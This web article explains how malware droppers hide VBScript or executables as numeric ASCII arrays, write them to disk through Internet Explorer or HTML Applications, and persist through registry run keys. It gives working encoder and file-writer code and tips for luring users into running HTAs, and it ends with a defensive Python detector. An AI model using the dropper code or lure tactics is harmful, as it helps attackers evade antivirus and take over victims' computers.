Things aren't always what they seem
A while back I got a couple of emails, from people I don't know, with executable attachments (.hta, .vbs, ...). When I looked at the contents, it looked as if they just contained a meaningless list of numbers, and a couple of document.write statements. Something like this :
MyFile=Array(84,104,105,115,32,105,115,32,97,110,32,69,118,105, 108,32,115,99,114,105,112,116,13,10,9,87,104,97,116,32,73,102, 32,13,10,9,9,97,110,100,32,83,111,13,10,13,10,9,78,101,120,116,13, 10,68,111,32,117,110,116,105,108,13,10,9,66,108,97,13,10,76,111,111, 112,13,10,69,120,105,116)
When you replace the numbers with the corresponding characters, as mapped in the ASCII table, it turns out that this array contained, character by character, a VB script that was meant to be written to the hard disk, and then executed. Yet another way to drop a virus (or a trojan, or whatever other malware). And as the contents was disguised in the array of numbers, I think antivirus software may well be unable to detect it. Hm.
It does make one wonder. How many web pages are out there waiting to be visited, and when you get there, they just run a script (as explained here) ?
And what if that script is similar to the array thing described here ? Would it be possible to drop a virus-like script on an innocent victim's pc, by writing it character by character to its hard disk, while he's just surfing the web unaware ? It's just a stream of characters transferred via http, so a firewall wouldn't even detect it ...
If so, then how ?
Write a file to an array
First of all, you'd need to create a virus. Let's, for now, assume this is a VB script. You'd need to turn it into a list of numbers, like this :
Const ForReading = 1
Const ForWriting = 2
srcfilename = "j:\src.txt"
destfilename = "j:\dest.txt"
Set fso = CreateObject("Scripting.FileSystemObject")
Set src = fso.OpenTextFile(srcfilename, ForReading)
Set dest = fso.OpenTextFile(destfilename, ForWriting, True)
dest.Write ("'This array contains the file, 1 byte / char per index")
dest.Write (vbCrLf)
dest.Write (vbCrLf)
dest.Write ("MyFile=Array(")
Do While Not src.AtEndOfStream
char = src.read(1)
dest.Write (asc(char))
dest.Write (chr(44))
Loop
dest.Write (")")
dest.Write (vbCrLf)
dest.Write ("'edit the code, don't forget to remove the trailing comma in the array")
dest.Write (vbCrLf)
src.Close
dest.Close
Set src = Nothing
Set dest = Nothing
Set fso = Nothing
MsgBox "Finished"
Create a file from an array
In Visual Basic Script, that could be something like this :
MyFile=Array(84,104, ..... )
For i = 0 to UBound(MyFile)
Result = Result & chr(MyFile(i))
Next
MsgBox Result
Here, the result is shown in a message box, but it could also be written to a file :
' MyFile is the array from the previous snippet
Const ForWriting = 2
destfilename = "j:\dest.txt"
Set fso = CreateObject("Scripting.FileSystemObject")
Set dest = fso.OpenTextFile(destfilename, ForWriting, True)
For i = 0 to UBound(MyFile)
dest.Write (chr(MyFile(i)))
Next
dest.Close
Set dest = Nothing
Set fso = Nothing
The example shows how to copy a text file, or a script. That's somewhat overkill : any script referenced by a web page (like <script src="thescript.vbs">) will be downloaded to the IE cache, the 'temporary internet files', and you may want to take it from there. However, the trick with the array does allow you to specify a destination, and can also be applied to compiled executables. A binary file can be copied to the target destination, byte by byte, simply by making the destination file name something like 'program.exe'.
However, more recent versions of Internet Explorer will not allow scripts from the internet to access the local file system other than the browser cache. Still, there are sufficient security holes in Internet Explorer to circumvent this.
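As an added example that is not from the original post: a small Python triage helper that finds such numeric Array(...) literals in a suspicious .vbs/.hta/.html attachment, decodes them the way the VB snippet above does, and flags decoded text that contains host-access markers. The marker list, the 16-item threshold, the helper names and the dropper-shaped sample are my own assumptions; the first sample is the array quoted at the top of the page.

```python
import re

# A VBScript Array(...) literal made only of small integers, as in the attachments
# above. Whitespace between items is tolerated (mail/HTML extraction re-wraps long
# lines), and so is the trailing comma the page's encoder leaves behind.
ARRAY_RE = re.compile(r"Array\(\s*((?:\d{1,3}\s*,\s*)*\d{1,3})\s*,?\s*\)", re.IGNORECASE)

# Markers that the decoded text is code touching the host, not a harmless data table.
SUSPICIOUS = ("CreateObject", "Scripting.FileSystemObject", "WScript.Shell",
              "OpenTextFile", "CurrentVersion\\Run", "Shell.Application")

def decode_numeric_array(codes_text: str) -> str:
    """'84,104,...' -> the characters it encodes, with VBScript Chr() range (0-255)."""
    out = []
    for tok in codes_text.split(","):
        tok = tok.strip()
        if tok == "":
            continue                      # trailing comma
        n = int(tok)
        if n > 255:
            raise ValueError(f"code {n} outside Chr() range")
        out.append(chr(n))
    return "".join(out)

def find_encoded_scripts(source: str, min_codes: int = 16) -> list:
    """Scan a .vbs/.hta/.html body; return (decoded_text, markers_hit) per long array."""
    findings = []
    for m in ARRAY_RE.finditer(source):
        codes = m.group(1)
        if codes.count(",") + 1 < min_codes:
            continue                      # tiny arrays are almost always real data
        decoded = decode_numeric_array(codes)
        hits = tuple(k for k in SUSPICIOUS if k.lower() in decoded.lower())
        findings.append((decoded, hits))
    return findings

def encode_as_vbs_array(text: str) -> str:
    """Builds constructed test input the way the page's encoder does (trailing comma kept)."""
    return "MyFile=Array(" + ",".join(str(ord(c)) for c in text) + ",)"

# The array quoted at the top of the page (stray spaces are extraction re-wrapping).
PAGE_SAMPLE = ("MyFile=Array(84,104,105,115,32,105,115,32,97,110,32,69,118,105, 108,32,115,"
               "99,114,105,112,116,13,10,9,87,104,97,116,32,73,102, 32,13,10,9,9,97,110,100,"
               "32,83,111,13,10,13,10,9,78,101,120,116,13, 10,68,111,32,117,110,116,105,108,"
               "13,10,9,66,108,97,13,10,76,111,111, 112,13,10,69,120,105,116)")
# Constructed sample in the shape of the dropper the page describes (not a real one).
DROPPER_SAMPLE = encode_as_vbs_array(
    'Set fso = CreateObject("Scripting.FileSystemObject")\r\n'
    'Set f = fso.OpenTextFile("dropped.vbs", 2, True)\r\n')
```

Run it over an attachment body with find_encoded_scripts(open(path).read()); an array that decodes to readable script text with markers hit is worth a closer look even when the antivirus says nothing.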
Ensure execution of the script
Lastly, one would have to make sure the script gets executed on the victim's computer. We can decide that it's fine if the script runs the next time the computer is started, or the next time the user logs on. So the script would have to create an appropriate registry key.

All of this works fine if you have execution of ActiveX content enabled for the internet zone. So the wise thing would be to have it DISabled. As Internet Explorer has been exploited numerous times through VBScript, this is now the default. There are, however, a couple of bugs in Internet Explorer that provide workarounds so that scripts similar to the ones discussed here will still be executed, despite the fact that you've disabled ActiveX. Examples can be found all over the internet :
proof of concept
security alerts and exploits
They usually combine a bug or some unexpected behaviour of Internet Explorer with creative use of the html IFRAME or OBJECT tag and/or URLs that point to scripts, to circumvent the security settings. So while it is not as straightforward as 'tell Internet Explorer to run any script', there are people out there looking for workarounds, and discovering them. If you've ever had serious trouble after visiting porn sites or sites where you'd hoped to find free keys for expensive software, you know what I'm talking about.
Now, what if all what has been described here, has been done while you were reading this page? If you're using Internet Explorer (and have ActiveX enabled for the internet), you would now have a script in your windows/systemfolder, it has been executed once already, and will run again next time you start your computer. Wanna give it a try ?
HTA : HTML Applications
While web-based scripts are executed in the security context of the browser, and thus can be prevented from accessing the local file system or executing local applications, Microsoft has developed HTML Applications, which is a technique intended to create web-based applications. These applications are executed in a browser, but have full access to the local system : it is a piece of cake to read or write files on the local computer, start programs, get a command prompt, etc. The user starts the application by clicking a link (disguised as a 'click here to download ... ' or something similar) and will be asked only once to 'open' or 'execute' the application - if the user assumes this is necessary to get his download started, he won't think twice about it.
Next, the HTA will run, and can be used to send additional scripts or executable programs to the victim's computer, modify registry keys to run those programs at startup, etc. The only limitation may be that the user does not have sufficient privileges on his own computer. But a lot of users have Administrator rights, so this may work most of the time. In fact, with access to the local file system, the command shell, and the possibility to upload and run executables (a mailer program, a telnet server, ... ), we can claim that this computer belongs to us. (more about HTML Applications)